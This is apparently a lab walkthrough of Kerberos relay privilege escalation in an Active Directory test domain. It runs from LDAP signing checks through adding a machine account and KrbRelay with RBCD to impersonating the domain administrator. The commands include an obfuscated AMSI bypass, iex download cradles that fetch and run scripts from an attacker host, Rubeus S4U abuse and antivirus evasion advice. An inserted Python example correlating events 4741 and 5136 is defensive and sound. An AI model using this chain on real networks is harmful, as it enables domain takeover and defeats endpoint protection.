Another very useful technique to escalate privileges is Kerberos relay, like implemented in
As KrbRelayUp is detected by Defender, we will use the step-by-step approach like by @an0n_r0, using @cube0x0
At the time of writing KrbRelay is not detected by Defender.
The precondition for this privesc is that LDAP signing is NOT enforced on the domain controller; we can check that with the cme ldap-signing module:
crackmapexec ldap 192.168.56.10-12 -u elena.lopez -p princesa1 -d north.newyork.local -M ldap-signing
Add computer and RBCD
To exploit KrbRelay by adding a computer, you must be able to add a new computer account (a MachineAccountQuota above 0); we can check that with the cme MAQ module:
crackmapexec ldap 192.168.56.11 -u elena.lopez -p princesa1 -d north.newyork.local -M MAQ
Add the computer (either set of credentials works; the second uses elena.lopez):
addcomputer.py -computer-name 'krbrelay$' -computer-pass 'ComputerPassword' -dc-host bronx.north.newyork.local -domain-netbios NORTH 'north.newyork.local/pacofish:pacofish'
addcomputer.py -computer-name 'krbrelay$' -computer-pass 'ComputerPassword' -dc-host bronx.north.newyork.local -domain-netbios NORTH 'north.newyork.local/elena.lopez:princesa1'
Get the SID of that computer:
From Windows:
$o = ([ADSI]"LDAP://CN=krbrelay,CN=Computers,DC=north,DC=newyork,DC=local").objectSID
(New-Object System.Security.Principal.SecurityIdentifier($o.value, 0)).Value
S-1-5-21-3634065772-4036021599-3644360361-1136
From Linux:
lookupsid.py -domain-sids north.newyork.local/elena.lopez:princesa1@192.168.56.10 0
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.56.31:8000/PowerView.ps1', 'C:\Users\Elena.Lopez\Documents\PowerView.ps1')
Check ports
Connect over RDP with xfreerdp and run CheckPort.exe to find a port that SYSTEM is allowed through:
xfreerdp /u:pacofish /p:pacofish /v:192.168.56.11 /cert-ignore
PS C:\Users\pacofish\Desktop> .\CheckPort.exe
[*] Looking for available ports..
[*] SYSTEM Is allowed through port 443
Launch krbrelay
CLSID: CIeAxiInstallerService Class
https://strontic.github.io/xcyclopedia/library/clsid_90F18417-F0F1-484E-9D3C-59DCEEE5DBD8.html
PS C:\Users\elena.lopez\Desktop> .\KrbRelay.exe -spn ldap/bronx.north.newyork.local -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 -rbcd S-1-5-21-3634065772-4036021599-3644360361-1136 -port 443
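From the defender's side, this chain leaves two correlatable traces in the Security log: a 4741 (computer account created) for krbrelay$ by a regular user, followed by a 5136 (directory object modified) on msDS-AllowedToActOnBehalfOfOtherIdentity of the relayed host's own computer object, written by that host's machine account and granting delegation to the freshly created SID. The following is an added detection example, not code from the original page or from KrbRelay; the event dicts are constructed and modelled on Security-log fields, and the SDDL rendering of the attribute value is an assumption.

```python
import re
from datetime import datetime, timedelta

RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"
SID_RE = re.compile(r"S-1-5-21-\d+-\d+-\d+-\d+")
NEW_SID = "S-1-5-21-3634065772-4036021599-3644360361-1136"  # krbrelay$ from the page

# Constructed sample events (modelled on Security-log fields, not real logs):
# 4741 = computer account created, 5136 = directory service object modified.
SAMPLE_EVENTS = [
    {"time": "2023-05-01T10:00:00", "id": 4741, "subject": "NORTH\\elena.lopez",
     "object": "CN=krbrelay,CN=Computers,DC=north,DC=newyork,DC=local", "sid": NEW_SID},
    {"time": "2023-05-01T10:07:30", "id": 5136, "subject": "NORTH\\YONKERS$",
     "object": "CN=YONKERS,CN=Computers,DC=north,DC=newyork,DC=local",
     "attribute": RBCD_ATTR,
     "value": "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;" + NEW_SID + ")"},
    # Benign change: an admin configures RBCD on another host for a long-lived SID.
    {"time": "2023-05-02T09:00:00", "id": 5136, "subject": "NORTH\\administrator",
     "object": "CN=WEB01,CN=Computers,DC=north,DC=newyork,DC=local",
     "attribute": RBCD_ATTR,
     "value": "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-3634065772-4036021599-3644360361-1105)"},
]

def _cn(dn):
    """First RDN value of a DN, upper-cased (CN=YONKERS,... -> YONKERS)."""
    return dn.split(",", 1)[0].split("=", 1)[1].upper()

def detect_rbcd_abuse(events, window=timedelta(hours=1)):
    """One alert per suspicious RBCD write. Signals: the writer is the target
    computer itself (relayed machine authentication), and/or a SID granted
    delegation belongs to a computer account created within `window` before."""
    created = {e["sid"]: e for e in events if e["id"] == 4741}
    alerts = []
    for e in events:
        if e["id"] != 5136 or e["attribute"] != RBCD_ATTR:
            continue
        reasons = []
        writer = e["subject"].split("\\")[-1].rstrip("$").upper()
        if writer == _cn(e["object"]):
            reasons.append("computer account wrote its own RBCD attribute")
        t = datetime.fromisoformat(e["time"])
        for sid in SID_RE.findall(e["value"]):
            c = created.get(sid)
            if c is None:
                continue
            age = t - datetime.fromisoformat(c["time"])
            if timedelta(0) <= age <= window:
                reasons.append(f"delegation granted to {_cn(c['object'])}$ created "
                               f"{age} earlier by {c['subject']}")
        if reasons:
            alerts.append({"target": _cn(e["object"]), "writer": e["subject"], "reasons": reasons})
    return alerts
```

5136 is only emitted when "Audit Directory Service Changes" is enabled and the computer objects carry a SACL for attribute writes; without that, the 4741 by a non-admin user is the remaining signal.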
Now we finish with RBCD exploitation
From Linux with Impacket:
getTGT.py -dc-ip 'bronx.north.newyork.local' 'north.newyork.local'/'krbrelay$':'ComputerPassword'
export KRB5CCNAME=/workspace/krbrelay\$.ccache
getST.py -impersonate 'administrator' -spn 'CIFS/yonkers.north.newyork.local' -k -no-pass -dc-ip 'bronx.north.newyork.local' 'north.newyork.local'/'krbrelay$'
export KRB5CCNAME=/workspace/administrator@CIFS_yonkers.north.newyork.local@NORTH.NEWYORK.LOCAL.ccache
wmiexec.py -k @yonkers.north.newyork.local
C:\>whoami
north\administrator
With Rubeus from Windows:
$x=[Ref].Assembly.GetType('System.Management.Automation.Am'+'siUt'+'ils');$y=$x.GetField('am'+'siCon'+'text',[Reflection.BindingFlags]'NonPublic,Static');$z=$y.GetValue($null);[Runtime.InteropServices.Marshal]::WriteInt32($z,0x41424344)
iex(new-object system.net.webclient).downloadstring('http://192.168.56.31:8080/amsi_rmouse.txt')
iex(new-object net.webclient).downloadstring('http://192.168.56.31:8080/PowerSharpPack/PowerSharpPack.ps1')
PowerSharpPack -rubeus -Command "hash /password:ComputerPassword"
PowerSharpPack -rubeus -Command "s4u /user:krbrelay$ /rc4:0EDDEDC35EB7B7ECDE0C9F0564E54C83 /impersonateuser:administrator /msdsspn:host/yonkers/ptt"
Without AV, or if you modify/obfuscate KrbRelayUp, you can do all of this with the following commands:
.\KrbRelayUp.exe relay -Domain north.newyork.local -CreateNewComputerAccount -ComputerName evilhost2$ -ComputerPassword pass@123
./KrbRelayUp.exe spawn -m rbcd -d north.newyork.local -dc bronx.north.newyork.local -cn evilhost2$ -cp pass@123
With other methods